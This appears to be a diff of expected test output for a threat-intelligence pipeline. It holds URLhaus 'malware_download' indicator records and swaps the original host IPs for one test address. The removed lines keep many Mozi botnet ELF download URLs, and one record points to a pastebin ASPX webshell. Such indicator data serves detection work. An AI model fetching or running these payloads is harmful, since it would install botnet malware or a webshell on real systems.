@@ -25268,18 +25268,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.41.216.92:50773/Mozi.m", + "original": "http://89.160.20.156:50773/Mozi.m", "scheme": "http", "port": 50773, - "domain": "27.41.216.92", - "full": "http://27.41.216.92:50773/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50773/Mozi.m" }, - "ip": "27.41.216.92" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694448648Z", - "original": "{\"id\":\"961027\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961027/\",\"url\":\"http://27.41.216.92:50773/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.41.216.92\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028326800Z", + "original": "{\"id\":\"961027\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961027/\",\"url\":\"http://89.160.20.156:50773/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25317,18 +25317,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.96.39.140:50050/Mozi.m", + "original": "http://89.160.20.156:50050/Mozi.m", "scheme": "http", "port": 50050, - "domain": "59.96.39.140", - "full": "http://59.96.39.140:50050/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50050/Mozi.m" }, - "ip": "59.96.39.140" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694452796Z", - "original": "{\"id\":\"961028\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961028/\",\"url\":\"http://59.96.39.140:50050/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.39.140\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028333700Z", + "original": "{\"id\":\"961028\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961028/\",\"url\":\"http://89.160.20.156:50050/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25366,18 +25366,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.59.203.162:60081/Mozi.m", + "original": "http://89.160.20.156:60081/Mozi.m", "scheme": "http", "port": 60081, - "domain": "182.59.203.162", - "full": "http://182.59.203.162:60081/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60081/Mozi.m" }, - "ip": "182.59.203.162" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694456473Z", - "original": "{\"id\":\"961024\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961024/\",\"url\":\"http://182.59.203.162:60081/Mozi.m\",\"url_status\":\"offline\",\"host\":\"182.59.203.162\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028340600Z", + "original": "{\"id\":\"961024\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961024/\",\"url\":\"http://89.160.20.156:60081/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25415,18 +25415,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.122.4:58177/Mozi.m", + "original": "http://89.160.20.156:58177/Mozi.m", "scheme": "http", "port": 58177, - "domain": "186.33.122.4", - "full": "http://186.33.122.4:58177/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58177/Mozi.m" }, - "ip": "186.33.122.4" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694462865Z", - "original": "{\"id\":\"961025\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961025/\",\"url\":\"http://186.33.122.4:58177/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.122.4\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028347500Z", + "original": "{\"id\":\"961025\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961025/\",\"url\":\"http://89.160.20.156:58177/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25464,18 +25464,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.41.164.93:38589/Mozi.m", + "original": "http://89.160.20.156:38589/Mozi.m", "scheme": "http", "port": 38589, - "domain": "125.41.164.93", - "full": "http://125.41.164.93:38589/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38589/Mozi.m" }, - "ip": "125.41.164.93" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694466301Z", - "original": "{\"id\":\"961023\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961023/\",\"url\":\"http://125.41.164.93:38589/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.41.164.93\",\"date_added\":\"2021-01-14 16:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028354800Z", + "original": "{\"id\":\"961023\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961023/\",\"url\":\"http://89.160.20.156:38589/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25513,18 +25513,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.120.42.220:39229/Mozi.a", + "original": "http://89.160.20.156:39229/Mozi.a", "scheme": "http", "port": 39229, - "domain": "182.120.42.220", - "full": "http://182.120.42.220:39229/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39229/Mozi.a" }, - "ip": "182.120.42.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694469698Z", - "original": "{\"id\":\"961022\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961022/\",\"url\":\"http://182.120.42.220:39229/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.120.42.220\",\"date_added\":\"2021-01-14 16:35:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028362400Z", + "original": "{\"id\":\"961022\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961022/\",\"url\":\"http://89.160.20.156:39229/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25562,18 +25562,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://121.181.32.38:53595/Mozi.a", + "original": "http://89.160.20.156:53595/Mozi.a", "scheme": "http", "port": 53595, - "domain": "121.181.32.38", - "full": "http://121.181.32.38:53595/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53595/Mozi.a" }, - "ip": "121.181.32.38" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694473154Z", - "original": "{\"id\":\"961021\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961021/\",\"url\":\"http://121.181.32.38:53595/Mozi.a\",\"url_status\":\"offline\",\"host\":\"121.181.32.38\",\"date_added\":\"2021-01-14 16:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028369400Z", + "original": "{\"id\":\"961021\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961021/\",\"url\":\"http://89.160.20.156:53595/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25611,18 +25611,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.119.207.249:57279/Mozi.m", + "original": "http://89.160.20.156:57279/Mozi.m", "scheme": "http", "port": 57279, - "domain": "182.119.207.249", - "full": "http://182.119.207.249:57279/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57279/Mozi.m" }, - "ip": "182.119.207.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694477302Z", - "original": "{\"id\":\"961018\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961018/\",\"url\":\"http://182.119.207.249:57279/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.119.207.249\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028376700Z", + "original": "{\"id\":\"961018\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961018/\",\"url\":\"http://89.160.20.156:57279/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25660,18 +25660,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.116.117.139:49019/Mozi.m", + "original": "http://89.160.20.156:49019/Mozi.m", "scheme": "http", "port": 49019, - "domain": "182.116.117.139", - "full": "http://182.116.117.139:49019/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49019/Mozi.m" }, - "ip": "182.116.117.139" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694480738Z", - "original": "{\"id\":\"961019\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961019/\",\"url\":\"http://182.116.117.139:49019/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.116.117.139\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028383700Z", + "original": "{\"id\":\"961019\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961019/\",\"url\":\"http://89.160.20.156:49019/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25709,18 +25709,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.150.84:48558/Mozi.m", + "original": "http://89.160.20.156:48558/Mozi.m", "scheme": "http", "port": 48558, - "domain": "182.121.150.84", - "full": "http://182.121.150.84:48558/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48558/Mozi.m" }, - "ip": "182.121.150.84" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694484075Z", - "original": "{\"id\":\"961020\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961020/\",\"url\":\"http://182.121.150.84:48558/Mozi.m\",\"url_status\":\"offline\",\"host\":\"182.121.150.84\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028390300Z", + "original": "{\"id\":\"961020\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961020/\",\"url\":\"http://89.160.20.156:48558/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25758,18 +25758,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://120.85.167.142:58913/Mozi.a",
+ "original": "http://89.160.20.156:58913/Mozi.a",
 "scheme": "http",
 "port": 58913,
- "domain": "120.85.167.142",
- "full": "http://120.85.167.142:58913/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:58913/Mozi.a"
 },
- "ip": "120.85.167.142"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694487461Z",
- "original": "{\"id\":\"961017\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961017/\",\"url\":\"http://120.85.167.142:58913/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.85.167.142\",\"date_added\":\"2021-01-14 16:34:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028395Z",
+ "original": "{\"id\":\"961017\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961017/\",\"url\":\"http://89.160.20.156:58913/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -25807,18 +25807,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.58.68.51:49608/Mozi.m",
+ "original": "http://89.160.20.156:49608/Mozi.m",
 "scheme": "http",
 "port": 49608,
- "domain": "115.58.68.51",
- "full": "http://115.58.68.51:49608/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:49608/Mozi.m"
 },
- "ip": "115.58.68.51"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694490817Z",
- "original": "{\"id\":\"961016\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961016/\",\"url\":\"http://115.58.68.51:49608/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.68.51\",\"date_added\":\"2021-01-14 16:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028399900Z",
+ "original": "{\"id\":\"961016\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961016/\",\"url\":\"http://89.160.20.156:49608/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -25857,18 +25857,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://112.168.65.51:41143/bin.sh",
+ "original": "http://89.160.20.156:41143/bin.sh",
 "scheme": "http",
 "port": 41143,
- "domain": "112.168.65.51",
- "full": "http://112.168.65.51:41143/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41143/bin.sh"
 },
- "ip": "112.168.65.51"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694494074Z",
- "original": "{\"id\":\"961013\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961013/\",\"url\":\"http://112.168.65.51:41143/bin.sh\",\"url_status\":\"online\",\"host\":\"112.168.65.51\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.028407100Z",
+ "original": "{\"id\":\"961013\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961013/\",\"url\":\"http://89.160.20.156:41143/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -25906,18 +25906,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.247.204.147:42129/Mozi.m",
+ "original": "http://89.160.20.156:42129/Mozi.m",
 "scheme": "http",
 "port": 42129,
- "domain": "117.247.204.147",
- "full": "http://117.247.204.147:42129/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:42129/Mozi.m"
 },
- "ip": "117.247.204.147"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694497330Z",
- "original": "{\"id\":\"961014\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961014/\",\"url\":\"http://117.247.204.147:42129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.204.147\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028414Z",
+ "original": "{\"id\":\"961014\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961014/\",\"url\":\"http://89.160.20.156:42129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -25955,18 +25955,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.247.204.127:47403/Mozi.m",
+ "original": "http://89.160.20.156:47403/Mozi.m",
 "scheme": "http",
 "port": 47403,
- "domain": "117.247.204.127",
- "full": "http://117.247.204.127:47403/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47403/Mozi.m"
 },
- "ip": "117.247.204.127"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694500666Z",
- "original": "{\"id\":\"961015\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961015/\",\"url\":\"http://117.247.204.127:47403/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.204.127\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028420900Z",
+ "original": "{\"id\":\"961015\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961015/\",\"url\":\"http://89.160.20.156:47403/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26004,18 +26004,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://120.85.184.207:60187/Mozi.m",
+ "original": "http://89.160.20.156:60187/Mozi.m",
 "scheme": "http",
 "port": 60187,
- "domain": "120.85.184.207",
- "full": "http://120.85.184.207:60187/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:60187/Mozi.m"
 },
- "ip": "120.85.184.207"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694503882Z",
- "original": "{\"id\":\"961011\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961011/\",\"url\":\"http://120.85.184.207:60187/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.184.207\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028427900Z",
+ "original": "{\"id\":\"961011\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961011/\",\"url\":\"http://89.160.20.156:60187/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26053,18 +26053,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.202.70.191:46097/Mozi.m",
+ "original": "http://89.160.20.156:46097/Mozi.m",
 "scheme": "http",
 "port": 46097,
- "domain": "117.202.70.191",
- "full": "http://117.202.70.191:46097/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:46097/Mozi.m"
 },
- "ip": "117.202.70.191"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694507118Z",
- "original": "{\"id\":\"961012\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961012/\",\"url\":\"http://117.202.70.191:46097/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.202.70.191\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028434800Z",
+ "original": "{\"id\":\"961012\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961012/\",\"url\":\"http://89.160.20.156:46097/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26102,18 +26102,18 @@
 "provider": "geenensp",
 "url": {
 "path": "/i",
- "original": "http://211.223.74.229:50771/i",
+ "original": "http://89.160.20.156:50771/i",
 "scheme": "http",
 "port": 50771,
- "domain": "211.223.74.229",
- "full": "http://211.223.74.229:50771/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50771/i"
 },
- "ip": "211.223.74.229"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694510404Z",
- "original": "{\"id\":\"961010\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961010/\",\"url\":\"http://211.223.74.229:50771/i\",\"url_status\":\"online\",\"host\":\"211.223.74.229\",\"date_added\":\"2021-01-14 16:31:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.028441700Z",
+ "original": "{\"id\":\"961010\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961010/\",\"url\":\"http://89.160.20.156:50771/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:31:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26158,7 +26158,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694514031Z",
+ "ingested": "2021-12-13T08:40:08.028448600Z",
 "original": "{\"id\":\"961009\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961009/\",\"url\":\"https://pastebin.com/raw/00aUJCLx\",\"url_status\":\"offline\",\"host\":\"pastebin.com\",\"date_added\":\"2021-01-14 16:29:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"pmelson\",\"larted\":\"false\",\"tags\":[\"ASPXShell\",\"webshell\"]}",
 "category": "threat",
 "type": "indicator",
